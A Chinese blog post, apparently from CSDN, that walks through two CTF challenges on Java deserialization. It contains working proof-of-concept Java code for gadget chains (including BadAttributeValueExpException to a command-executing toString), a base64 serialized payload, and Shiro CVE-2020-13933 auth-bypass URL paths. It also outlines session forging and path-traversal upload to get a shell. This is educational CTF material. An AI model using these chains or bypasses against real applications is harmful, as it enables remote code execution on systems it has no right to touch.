从CTF题学Java反序列化(二)

最新推荐文章于 2024-05-16 10:23:10 发布
最新推荐文章于 2024-05-16 10:23:10 发布
阅读量223 收藏
点赞数
文章标签: java 开发语言 spring 算法
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/why811/article/details/132809693
版权

springmvcdemo

先过了一遍源码,看了一下功能

showpic.form?file=有类似于文件包含的功能

uploadpic.form可以上传文件,但是需要session中group为webmanager

Tools.class有序列化与反序列化功能,其中Tools自己这个类可被序列化,并且实现了readObject方法还有个危险函数ProcessBuilder((String[])obj)).start()

题目正常功能是对ClientInfo类存取session内容进行序列化反序列化,但是这个cinfo内容根据代码逻辑来看实际上是用户可控的

然后看到Tools类和ClientInfo类的serialVersionUID相同,为反序列化Tools类创造了条件

预期解

通过ClientInfoFilter类中调用Tools.parse对传入cookie内容直接进行反序列化的漏洞,加上Tools类中有ProcessBuilder((String[])obj)).start()函数可以执行命令,以及serialVersionUID相同,我们可以直接构造序列化Tools类,然后修改cookie,触发反序列化漏洞达成命令执行

注意ProcessBuilder传入的是String[],我们可以直接本地构造Tools类,注意testCall[]的public属性,或者直接在类中初始化命令也可:

public class Tools implements Serializable {
    private static final long serialVersionUID = 1L;
    
    public static Object parse(byte[] bytes) throws Exception {
        ......
    }
    public String testCall[];
    public static byte[] create(Object obj) throws Exception {
        ......
    }
    
    private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
        ......
    }
    //public String testCall[] = {"bash","-c","open /System/Applications/Calculator.app"};
}

然后Poc:

import com.tools.Tools;
import java.util.Base64;

public class Poc {
    public static void main(String[] args) throws Exception {
        Tools evil = new Tools();
        String cmd[] = {"bash","-c","open /System/Applications/Calculator.app"};
        evil.testCall = cmd; // 这里我们前面修改了public属性所以可以直接改
        byte[] bytes = Tools.create(evil);
        Base64.Encoder encoder = Base64.getEncoder();
        System.out.println(encoder.encodeToString(bytes));
    }
}

然后得到base64后的序列化值修改cookie后触发弹计算器:

非预期

上传需要group为webmanager,但是我们可以伪造session:

然后就可以正常上传文件了,文件上传没有检测,上传目录是WEB-INF/resource/,但是文件包含showpic.form?file=当文件后缀为jsp时,工作目录是WEB-INF/且无法路径穿越,所以尝试上传时路径穿越:

然后利用文件包含执行拿shell

javaweb

运行起来是个登录页面,所以首先看到LoginController.classLoginController,发现使用shiro的AuthenticationToken来认证用户名密码,百度了解了一下:

继续看到在MyRealm.class重写了doGetAuthenticationInfo,判断用户名为admin,密码随机生成

  • IndexController.class对cookie进行了序列化反序列化操作
  • MyFilter.classAllFilter.classIAllFilter.class对url进行解析

但是这里出现了一个问题,shiro-1.5.3版本存在CVE-2020-13933权限绕过,具体原理主要是shiro层在处理url上和spring上存在差异,主要是在处理;上的问题,通过构造含有;符号的url即可绕过shiro在权限上的处理

这道题对url的处理基本与CVE-2020-13933一致,所以可以使用以下path绕过

/index/%3b/admin
/index/'/admin
/index/select/admin
/index/union/admin

看到展示了访问日志,并没有其他功能,继续审计源码

Tools类的exeCmd实现了命令执行:

LogHandler类的invoke方法和toString方法分别都调用了exeCmd实现了写日志和读日志功能

现在命令执行的点和反序列化的点都找到了,剩下就是需要找到一条将其连起来的利用链

在之前在cc链中注意到一个能触发toString的类BadAttributeValueExpException,它重写的readObject函数会自动调用类属性的toString方法

这个BadAttributeValueExpException是原生类,jdk8下可以使用,不需要考虑环境问题

需要注意这里System.getSecurityManager为空,就是当前的jvm环境不能启用安全管理器

利用链:

BadAttributeValueExpException.readObject()
        -> valObj.toString() -> LogHandler.toString()
        -> Tools.exeCmd()

模仿cc5中BadAttributeValueExpException的用法,完成调用链

构造poc:

//Poc.java
import java.lang.reflect.Field;
import javax.management.BadAttributeValueExpException;
import com.ctf.javaweb.tools.LogHandler;
import com.ctf.javaweb.tools.Tools;

public class Poc {
    public static void main(String[] args) throws Exception{
    LogHandler logHandler = new LogHandler();
    BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
    Field field = badAttributeValueExpException.getClass().getDeclaredField("val");
    field.setAccessible(true);
    field.set(badAttributeValueExpException, logHandler);
    String datas = Tools.base64Encode(Tools.serialize(badAttributeValueExpException));
    System.out.println(datas);
    }
}
//com/ctf/javaweb/tools/LogHandler.java
package com.ctf.javaweb.tools;

import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Method;
import java.util.HashSet;

public class LogHandler extends HashSet implements InvocationHandler {
    private static final long serialVersionUID = 1L;
    private Object target;
    private String readLog = "open /System/Applications/Calculator.app";
    private String writeLog = "echo /test >> /tmp/accessLog";
    
    public LogHandler() {}
    
    public LogHandler(Object target) {
        this.target = target;
    }
    public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
        Tools.exeCmd(this.writeLog.replaceAll("/test", (String)args[0]));
        return method.invoke(this.target, args);
    }
    
    public String toString() {
        return Tools.exeCmd(this.readLog);
    }
}
rO0ABXNyAC5qYXZheC5tYW5hZ2VtZW50LkJhZEF0dHJpYnV0ZVZhbHVlRXhwRXhjZXB0aW9u1Ofaq2MtRkACAAFMAAN2YWx0ABJMamF2YS9sYW5nL09iamVjdDt4cgATamF2YS5sYW5nLkV4Y2VwdGlvbtD9Hz4aOxzEAgAAeHIAE2phdmEubGFuZy5UaHJvd2FibGXVxjUnOXe4ywMABEwABWNhdXNldAAVTGphdmEvbGFuZy9UaHJvd2FibGU7TAANZGV0YWlsTWVzc2FnZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sACnN0YWNrVHJhY2V0AB5bTGphdmEvbGFuZy9TdGFja1RyYWNlRWxlbWVudDtMABRzdXBwcmVzc2VkRXhjZXB0aW9uc3QAEExqYXZhL3V0aWwvTGlzdDt4cHEAfgAIcHVyAB5bTGphdmEubGFuZy5TdGFja1RyYWNlRWxlbWVudDsCRio8PP0iOQIAAHhwAAAAAXNyABtqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnRhCcWaJjbdhQIACEIABmZvcm1hdEkACmxpbmVOdW1iZXJMAA9jbGFzc0xvYWRlck5hbWVxAH4ABUwADmRlY2xhcmluZ0NsYXNzcQB+AAVMAAhmaWxlTmFtZXEAfgAFTAAKbWV0aG9kTmFtZXEAfgAFTAAKbW9kdWxlTmFtZXEAfgAFTAANbW9kdWxlVmVyc2lvbnEAfgAFeHABAAAACXQAA2FwcHQAA1BvY3QACFBvYy5qYXZhdAAEbWFpbnBwc3IAH2phdmEudXRpbC5Db2xsZWN0aW9ucyRFbXB0eUxpc3R6uBe0PKee3gIAAHhweHNyACBjb20uY3RmLmphdmF3ZWIudG9vbHMuTG9nSGFuZGxlcgAAAAAAAAABAgADTAAHcmVhZExvZ3EAfgAFTAAGdGFyZ2V0cQB+AAFMAAh3cml0ZUxvZ3EAfgAFeHIAEWphdmEudXRpbC5IYXNoU2V0ukSFlZa4tzQDAAB4cHcMAAAAED9AAAAAAAAAeHQAKG9wZW4gL1N5c3RlbS9BcHBsaWNhdGlvbnMvQ2FsY3VsYXRvci5hcHBwdAAcZWNobyAvdGVzdCA+PiAvdG1wL2FjY2Vzc0xvZw==

修改cookie的userinfo字段,刷新页面

why811
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
bfengj#CTF#thinkphp5.0.24反序列化rce1
07-25
thinkphp5.0.24反序列化rceModel是抽象类protected $append = [];// $value值,作为call函数引用的第变量p
CVE-2020-24616: Jackson 多个反序列化安全漏洞通告
爱国小白帽
08-27 3986
360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-082701 报告来源:360CERT 报告作者:360CERT 更新日期:2020-08-27 0x01 漏洞简述 2020年08月27日,360CERT监测发现jackson-databind 发布了 jackson-databind 序列化漏洞 的风险通告,该漏洞编号为 CVE-2020-24616 ,漏洞等级:高危,漏洞评分:7.5。 br.com.anteros:Anteros-DB
从JSON1链中学习处理JACKSON链的不稳定性五
stopluox的博客
09-25 89
本文学习了 JSON1 链,使用 Spring AOP 中的 JdkDynamicAopProxy 作为 gadget,修改 JACKSON 链,将以随机顺序触发 TemplatesImpl 上的所有 getter , 转换成了只触发 getOutputProperties ,避免了 JACKSON 链的不稳定性,同时, JACKSON 链依然可以在 SpringBoot 环境下直接使用。
从xxe到rce-记一道ctf中的java
灰太的表格的博客
04-02 1054
从xxe到rce-记一道ctf中的java
CTF学习Java反序列化
why811的博客
08-18 741
我们可以看到cookie里面返回了Java序列化内容,带着cookie访问返回了hello {{username}}的字符,说明我们传入的cookie被反序列化了。其实看到LogHandler不能反序列化的时候,直接一口否定了他的可利用性,并没有去尝试,那么为什么不实际尝试一下呢?其实再仔细一点,可以发现这个类继承了HashSet,HashSet实现了Serializable接口,貌似可以搞事。(但是打final的时候是没有公网的,附件只有源码,需要去靶机上面把本地repo拖下来。
CtfshowJava反序列化
weixin_56537388的博客
08-15 417
发现进入URLsteamhander,他的hashcode使用了getAddress,我们最终要做的就是调用getaddress,获取DNS解析。调用hashmap最后调用的是url的hashcode方法,在最后调用getaddress。重写是子类对父类可以访问方法的重新编写,返回值和形参都不能改变,可以看到,put的时候调用了hashcode,不是-1了。,子类对象赋值给父类使用,但是不能访问在子类特有的方法。这里的初始值是-1,只有为-1才能传数据。ysoserial工具。这里使用了重写的概念。
java反序列化基础知识笔记
qq_43936524的博客
05-08 545
文章目录parse(),parseObject()的区别 parse(),parseObject()的区别
Java安全(十四) CTF-Java题目复现
WDWAGAAFGAGDADSA的博客
05-04 2338
最近复现学习的java题目
php代码-ctf payload 第九题 反序列化 do you know robot
07-15
php代码-ctf payload 第九题 反序列化 do you know robot
从一道CTF题学习PHP反序列化漏洞-附件资源
03-02
从一道CTF题学习PHP反序列化漏洞-附件资源
第85天:CTF夺旗-JAVA考点反编译&XXE&反序列化1
08-03
CTF 夺旗-JAVA 考点反编译&XXE&反序列化#Java 常考点及出题思路考点技术:xxe,spel 表达式,反序列化,文件安全,最新框架插件漏洞等设法间
CTF-java反编译工具id-gui
11-01
由于Java、.net这样的基于虚拟机技术的语言都是采用了ByteCode的进制结构,因此很容易将ByteCode转化为“抽象语法树”(简称AST,《编译原理》这门课中的概念),然后采用反编译器就可以将AST转换为代码了。
jackson java反序列化,如何使用Jackson JSON和JAVA反序列化多态LinkedList?
weixin_39822629的博客
02-16 127
I´m having some problems when i try to deserializing a Java class.My classes are :Abstract Class A {Long IDString name...}Class B extends A{String TypeString Value}Class C extends A{List typedList;}An...
利用Vulnhub复现漏洞 - Jackson-databind 反序列化漏洞(CVE-2017-7525)
JiangBuLiu的博客
07-10 8233
Jackson-databind 反序列化漏洞(CVE-2017-7525)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现端口设置浏览器设置BurpSuit设置CVE-2017-7525CVE-2017-17485 Vulnhub官方复现教程 https://vulhub.org/#/environments/jackson/CVE-2017-7525/ 漏洞原理 Jackson-da...
jackson框架java反序列化漏洞_Jackson enableDefaultTyping 方法反序列化代码执行漏洞(CVE-2017-7525)...
weixin_35983968的博客
02-23 436
Earlier this year, a vulnerability was discovered in the Jackson data-binding library, a library for Java that allows developers to easily serialize Java objects to JSON and vice versa, that allowed a...
jackson-databind反序列化漏洞
公众号shadow sock7
09-17 7570
CVE-2019-14540 A Polymorphic Typing issue was discovered in FasterXML jackson-databind before 2.9.10. It is related to com.zaxxer.hikari.HikariConfig. 这里使用的是:com.zaxxer.hikari.HikariConfig CVE-2019-...
刷题记录-NPUCTF2020(web部分)
weixin_43610673的博客
05-03 4699
在buu刷了一遍,题目好顶,还剩一题EzShiro摸不出来 ReadlezPHP 禁用了右键查看源代码 view-source: 自行加上前缀即可 打开链接/time.php?source 很明显,php反序列化,通过echo b(b(b(a); 写入shell,system等被禁用,用assert(断言) <?php class HelloPhp { public $a; ...
jar包增量更新分析
最新发布
junlaiyan的专栏
05-16 251
借助jdeps分析出jar包的增量文件
ctf php反序列化
06-07
CTF中的PHP反序列化攻击主要针对使用PHP的Web应用程序,攻击者可以利用PHP反序列化漏洞来执行恶意代码或者获取敏感信息。攻击者通常会通过构造恶意的序列化数据来触发漏洞,从而实现攻击的目的。 在实际攻击中,攻击者通常会在Cookie、GET或POST参数中注入恶意的序列化数据,然后通过触发漏洞来执行恶意代码或获取敏感信息。为了防止这种攻击,应用程序开发人员需要对输入进行严格的过滤和验证,并且尽可能避免使用反序列化功能。此外,还可以使用专门的安全框架来防止这种攻击,比如PHP的Suhosin扩展。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值